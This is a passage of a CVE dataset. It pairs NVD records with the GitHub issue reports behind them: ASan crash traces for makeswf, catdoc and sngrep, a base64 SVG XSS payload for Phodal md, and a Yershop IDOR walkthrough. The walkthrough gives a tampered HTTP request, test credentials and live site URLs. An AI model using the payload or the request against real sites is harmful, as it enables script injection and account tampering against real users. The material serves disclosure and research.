#4 0x4cddc6 in main /home/root/Dataset/libming/sourcecode/libming-ming-0_4_8/util/makeswf.c:412:9
#5 0x7f3229403082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#6 0x41d5bd in _start (/home/root/Dataset/libming/sourcecode/origin_asan/install/bin/makeswf+0x41d5bd)
Address 0x7ffd856fb8a0 is located in stack of thread T0 at offset 1056 in frame
#0 0x4d0d7f in makeswf_preprocess /home/root/Dataset/libming/sourcecode/libming-ming-0_4_8/util/makeswf_utils.c:240
This frame has 2 object(s):
[32, 1056) 'buf' (line 241)
[1184, 1328) 'statbuf' (line 243) <== Memory access at offset 1056 partially underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/root/Dataset/libming/sourcecode/origin_asan/install/bin/makeswf+0x43d92f) in __interceptor_vsprintf
Shadow bytes around the buggy address:
0x100030ad76c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100030ad76d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100030ad76e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100030ad76f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100030ad7700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100030ad7710: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
0x100030ad7720: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00
0x100030ad7730: 00 00 00 00 00 00 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
0x100030ad7740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100030ad7750: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00
0x100030ad7760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==2497535==ABORTING
```
| makeswf stack buffer overflow | https://api.github.com/repos/libming/libming/issues/265/comments | 0 | 2023-02-28T06:17:08Z | 2023-02-28T06:17:08Z | https://github.com/libming/libming/issues/265 | 1,602,439,311 | 265 | 5,091 |
CVE-2023-31979 | 2023-05-09T14:15:13.820 | Catdoc v0.95 was discovered to contain a global buffer overflow via the function process_file at /src/reader.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/petewarden/catdoc/issues/9"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/petewarden/catdoc/issues/9"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:catdoc_project:catdoc:0.95:*:*:*:*:*:*:*",
"matchCriteriaId": "6CE9FF5B-A288-4C98-B162-231FDEDCE4AC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/petewarden/catdoc/issues/9 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"petewarden",
"catdoc"
] | When the program input contains the option of "-b" , the program will cause global buffer overflow error.
Test Environment
Ubuntu 20.04, 64 bit catdoc (version: 0.95; )
How to trigger
Compile the program with AddressSanitizer
Run command $ .catdoc -b $POC
Details
ASAN report
$./catdoc -b $POC
```
=================================================================
==928572==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000ddb81e at pc 0x0000004cfcf2 bp 0x7ffd66b3b610 sp 0x7ffd66b3b608
READ of size 2 at 0x000000ddb81e thread T0
#0 0x4cfcf1 in process_file /home/root/FuzzDateset/catdoc/catdoc-0.95/src/reader.c:175:6
#1 0x4d12a2 in analyze_format /home/root/FuzzDateset/catdoc/catdoc-0.95/src/analyze.c:38:10
#2 0x4cd221 in main /home/root/FuzzDateset/catdoc/catdoc-0.95/src/catdoc.c:180:6
#3 0x7fcb6627f082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#4 0x41d44d in _start (/home/root/randomFuzz/catdoc/catdoc/catdoc_a_u_b/catdoc+0x41d44d)
0x000000ddb81e is located 2 bytes to the left of global variable 'buffer' defined in 'reader.c:13:20' (0xddb820) of size 524288
0x000000ddb81e is located 22 bytes to the right of global variable 'output_buffer' defined in 'catdoc.c:26:22' (0xddb800) of size 8
SUMMARY: AddressSanitizer: global-buffer-overflow /home/root/FuzzDateset/catdoc/catdoc-0.95/src/reader.c:175:6 in process_file
Shadow bytes around the buggy address:
0x0000801b36b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000801b36c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000801b36d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000801b36e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000801b36f0: 00 00 00 00 04 f9 f9 f9 00 f9 f9 f9 00 f9 f9 f9
=>0x0000801b3700: 00 f9 f9[f9]00 00 00 00 00 00 00 00 00 00 00 00
0x0000801b3710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000801b3720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000801b3730: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000801b3740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000801b3750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==928572==ABORTING
```
The URL of PoC is [PoC](https://github.com/randomssr/PoCs/blob/main/catdoc/global-buffer-overflow) | catdoc global buffer overflow -- by misuse of the option "-b" | https://api.github.com/repos/petewarden/catdoc/issues/9/comments | 2 | 2023-02-27T08:00:11Z | 2023-07-04T14:54:44Z | https://github.com/petewarden/catdoc/issues/9 | 1,600,670,457 | 9 | 5,092 |
CVE-2023-31981 | 2023-05-09T14:15:13.863 | Sngrep v1.6.0 was discovered to contain a stack buffer overflow via the function packet_set_payload at /src/packet.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/irontec/sngrep/issues/430"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/irontec/sngrep/issues/430"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:irontec:sngrep:1.6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "86F5A8B5-378C-45C8-8F83-4012F88FBEFD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/irontec/sngrep/issues/430 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"irontec",
"sngrep"
] |
I found a stack buffer overflow in sngrep.
Please confirm.
Thanks!
Test Environment
Ubuntu 20.04, 64 bit sngrep (version: v1.6.0 ;[5089514](https://github.com/irontec/sngrep/commit/5089514cd83b88016c9876a6e4d8a33b56e58123))
How to trigger
Compile the program with AddressSanitizer
Run command $ ./sngrep -N -R -I $PoC
Details
ASAN report
$./sngrep -N -R -I $PoC
```
Dialog count: 0=================================================================
==974123==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fda5fffe9a0 at pc 0x00000049b787 bp 0x7fda5fff98d0 sp 0x7fda5fff9098
READ of size 57344 at 0x7fda5fffe9a0 thread T1
#0 0x49b786 in __asan_memcpy (/home/root/randomFuzz/sngrep/sngrep/sngrep_N_R_I/sngrep+0x49b786)
#1 0x4dc7f1 in packet_set_payload /home/root/FuzzDateset/sngrep/sngrep-1.6.0/src/packet.c:147:9
#2 0x4d1697 in parse_packet /home/root/FuzzDateset/sngrep/sngrep-1.6.0/src/capture.c:430:9
#3 0x7fda61bad466 (/lib/x86_64-linux-gnu/libpcap.so.0.8+0x23466)
#4 0x7fda61b9bf67 in pcap_loop (/lib/x86_64-linux-gnu/libpcap.so.0.8+0x11f67)
#5 0x4cf5c9 in capture_thread /home/root/FuzzDateset/sngrep/sngrep-1.6.0/src/capture.c:1042:5
#6 0x7fda61b6d608 in start_thread /build/glibc-SzIz7B/glibc-2.31/nptl/pthread_create.c:477:8
#7 0x7fda61918132 in __clone /build/glibc-SzIz7B/glibc-2.31/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95
Address 0x7fda5fffe9a0 is located in stack of thread T1 at offset 20512 in frame
#0 0x4d067f in parse_packet /home/root/FuzzDateset/sngrep/sngrep-1.6.0/src/capture.c:321
This frame has 3 object(s):
[32, 20512) 'data' (line 333)
[20768, 20772) 'size_capture' (line 337) <== Memory access at offset 20512 partially underflows this variable
[20784, 20788) 'size_payload' (line 339) <== Memory access at offset 20512 partially underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
Thread T1 created by T0 here:
#0 0x486a8c in pthread_create (/home/root/randomFuzz/sngrep/sngrep/sngrep_N_R_I/sngrep+0x486a8c)
#1 0x4d712c in capture_launch_thread /home/root/FuzzDateset/sngrep/sngrep-1.6.0/src/capture.c:1027:13
#2 0x4efb9e in main /home/root/FuzzDateset/sngrep/sngrep-1.6.0/src/main.c:433:9
#3 0x7fda6181d082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/root/randomFuzz/sngrep/sngrep/sngrep_N_R_I/sngrep+0x49b786) in __asan_memcpy
Shadow bytes around the buggy address:
0x0ffbcbff7ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffbcbff7cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffbcbff7d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffbcbff7d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffbcbff7d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0ffbcbff7d30: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
0x0ffbcbff7d40: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
0x0ffbcbff7d50: f2 f2 f2 f2 04 f2 04 f3 00 00 00 00 00 00 00 00
0x0ffbcbff7d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffbcbff7d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffbcbff7d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==974123==ABORTING
```
The URL of PoC is [PoC](https://github.com/randomssr/PoCs/blob/main/sngrep/id0-stack-overflow) | [bug] sngrep stack buffer overflow | https://api.github.com/repos/irontec/sngrep/issues/430/comments | 4 | 2023-03-01T02:37:56Z | 2023-07-17T09:13:55Z | https://github.com/irontec/sngrep/issues/430 | 1,604,128,076 | 430 | 5,093 |
CVE-2023-31982 | 2023-05-09T14:15:13.907 | Sngrep v1.6.0 was discovered to contain a heap buffer overflow via the function capture_packet_reasm_ip at /src/capture.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/irontec/sngrep/issues/431"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/irontec/sngrep/issues/431"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:irontec:sngrep:1.6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "86F5A8B5-378C-45C8-8F83-4012F88FBEFD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/irontec/sngrep/issues/431 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"irontec",
"sngrep"
] |
I found a heap buffer overflow in sngrep.
Please confirm.
Thanks!
Test Environment
Ubuntu 20.04, 64 bit sngrep (version: v1.6.0 ;[5089514](https://github.com/irontec/sngrep/commit/5089514cd83b88016c9876a6e4d8a33b56e58123))
How to trigger
Compile the program with AddressSanitizer
Run command $ ./sngrep -N -R -I $PoC
Details
ASAN report
$./sngrep -N -R -I $PoC
```
Dialog count: 0=================================================================
==974271==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000080a0 at pc 0x0000004d385c bp 0x7f69535f92f0 sp 0x7f69535f92e8
READ of size 2 at 0x6020000080a0 thread T1
#0 0x4d385b in capture_packet_reasm_ip /home/root/FuzzDateset/sngrep/sngrep-1.6.0/src/capture.c:678:49
#1 0x4d0d09 in parse_packet /home/root/FuzzDateset/sngrep/sngrep-1.6.0/src/capture.c:367:17
#2 0x7f695522a466 (/lib/x86_64-linux-gnu/libpcap.so.0.8+0x23466)
#3 0x7f6955218f67 in pcap_loop (/lib/x86_64-linux-gnu/libpcap.so.0.8+0x11f67)
#4 0x4cf5c9 in capture_thread /home/root/FuzzDateset/sngrep/sngrep-1.6.0/src/capture.c:1042:5
#5 0x7f69551ea608 in start_thread /build/glibc-SzIz7B/glibc-2.31/nptl/pthread_create.c:477:8
#6 0x7f6954f95132 in __clone /build/glibc-SzIz7B/glibc-2.31/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95
0x6020000080a0 is located 15 bytes to the right of 1-byte region [0x602000008090,0x602000008091)
allocated by thread T1 here:
#0 0x49c3cd in __interceptor_malloc (/home/root/randomFuzz/sngrep/sngrep/sngrep_N_R_I/sngrep+0x49c3cd)
#1 0x4dbb59 in packet_add_frame /home/root/FuzzDateset/sngrep/sngrep-1.6.0/src/packet.c:123:19
#2 0x4d31ee in capture_packet_reasm_ip /home/root/FuzzDateset/sngrep/sngrep-1.6.0/src/capture.c:639:9
#3 0x4d0d09 in parse_packet /home/root/FuzzDateset/sngrep/sngrep-1.6.0/src/capture.c:367:17
#4 0x7f695522a466 (/lib/x86_64-linux-gnu/libpcap.so.0.8+0x23466)
Thread T1 created by T0 here:
#0 0x486a8c in pthread_create (/home/root/randomFuzz/sngrep/sngrep/sngrep_N_R_I/sngrep+0x486a8c)
#1 0x4d712c in capture_launch_thread /home/root/FuzzDateset/sngrep/sngrep-1.6.0/src/capture.c:1027:13
#2 0x4efb9e in main /home/root/FuzzDateset/sngrep/sngrep-1.6.0/src/main.c:433:9
#3 0x7f6954e9a082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/root/FuzzDateset/sngrep/sngrep-1.6.0/src/capture.c:678:49 in capture_packet_reasm_ip
Shadow bytes around the buggy address:
0x0c047fff8fc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8fd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8fe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9000: fa fa 00 00 fa fa fd fa fa fa fd fa fa fa 00 00
=>0x0c047fff9010: fa fa 01 fa[fa]fa fd fd fa fa 00 00 fa fa 01 fa
0x0c047fff9020: fa fa 00 00 fa fa 01 fa fa fa 00 00 fa fa 01 fa
0x0c047fff9030: fa fa 00 00 fa fa 01 fa fa fa 00 00 fa fa 01 fa
0x0c047fff9040: fa fa 00 00 fa fa 01 fa fa fa 00 00 fa fa 01 fa
0x0c047fff9050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==974271==ABORTING
```
The URL of PoC is [PoC](https://github.com/randomssr/PoCs/blob/main/sngrep/id4-heap-overflow) | [bug] sngrep heap buffer overflow | https://api.github.com/repos/irontec/sngrep/issues/431/comments | 1 | 2023-03-01T02:42:36Z | 2023-03-03T11:54:45Z | https://github.com/irontec/sngrep/issues/431 | 1,604,131,402 | 431 | 5,094 |
CVE-2020-18280 | 2023-05-09T16:15:13.690 | Cross Site Scripting vulnerability found in Phodal CMD v.1.0 allows a local attacker to execute arbitrary code via the EMBED SRC function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/phodal/md/issues/20"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/phodal/md/issues/20"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:md_project:md:1.0:*:*:*:*:wechat:*:*",
"matchCriteriaId": "57E51B10-D8B1-455E-9D8C-71E59C88D892",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/phodal/md/issues/20 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"phodal",
"md"
] | This label and attack vector will cause dom-based XSS.
if you type
`<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhhYVMiKTs8L3NjcmlwdD48L3N2Zz4=" type="image/svg+xml" AllowScriptAccess="always"></EMBED>`,the xss vulnerability will be triggered.

| XSS vulnerability in <EMBED> label,SVG include attack vector. | https://api.github.com/repos/phodal/md/issues/20/comments | 1 | 2019-07-02T05:42:18Z | 2021-01-05T12:55:51Z | https://github.com/phodal/md/issues/20 | 463,030,721 | 20 | 5,095 |
CVE-2020-23362 | 2023-05-09T16:15:13.963 | Insecure Permissons vulnerability found in Shop_CMS YerShop all versions allows a remote attacker to escalate privileges via the cover_id parameter. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 4.2,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 4.2,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/huyiwill/shopcms_lang/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/huyiwill/shopcms_lang/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yershop_project:yershop:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7EA9478C-AE02-4BEA-9ECF-CBE71D8FB501",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"269"
] | 269 | https://github.com/huyiwill/shopcms_lang/issues/1 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"huyiwill",
"shopcms_lang"
] | Yershop mall has a horizontal ultra vires vulnerability, which can be used to maliciously change any user name for the full version of the vulnerability, resulting in the user unable to log in the account.
The account passwords of the following cases are all below
Account 1: lu0r3n
Password: lu0r3n
Account 2: lu0r3n1
Password: lu0r3n
Case 1: http://39.105.34.27/projects/index.php/index/index/index.html
Landing place: http://39.105.34.27/projects/index.php/index/user/login.html
Personal data change office: http://39.105.34.27/projects/index.php/index/user/edit.html

Use burp to cut package when saving
Packet:
POST /projects/ index.php/index/user/edit .html HTTP/1.1
Host: 39.105.34.27
Content-Length: 66
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://39.105.34.27
Referer: http://39.105.34.27/projects/index.php/index/user/edit.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: j1eU_ 2132_ saltkey=nj6wEe8s; j1eU_ 2132_ lastvisit=1588948355; j1eU_ 2132_ sid=UQR48r; PHPSESSID=174ae4d03e7fb8e838248372b01e3c3f; j1eU_ 2132_ lastact=1588952051%09 index.php%09
Connection: close
cover_ id=1&username=lu0r3n&sex=%E4%BF%9D%E5%AF%86&birthday=&id=382
Change id = 382 to id = 381 (because the ID of account 2 is 381, change the user name of account 2 here), change username = lu0r3n to hack, and then put the package

Come to the login place again, try to log in with the previous account password, but the user does not exist

Change lu0r3n1 to hack to log in and prove that the vulnerability exists
![Uploading image.png…]()
Case 2: http://www.sqdd.xyz/index.php/index/index/index.html
Landing place: http://www.sqdd.xyz/index.php/index/user/login.html
Personal information change: http://www.sqdd.xyz/index.php/index/user/edit.html
Case 3: http://www.cyawl.com/index.php/index/index/index.html
Landing place: http://www.cyawl.com/index.php/index/user/login.html
Personal information change: http://www.cyawl.com/index.php/index/member/edit.html
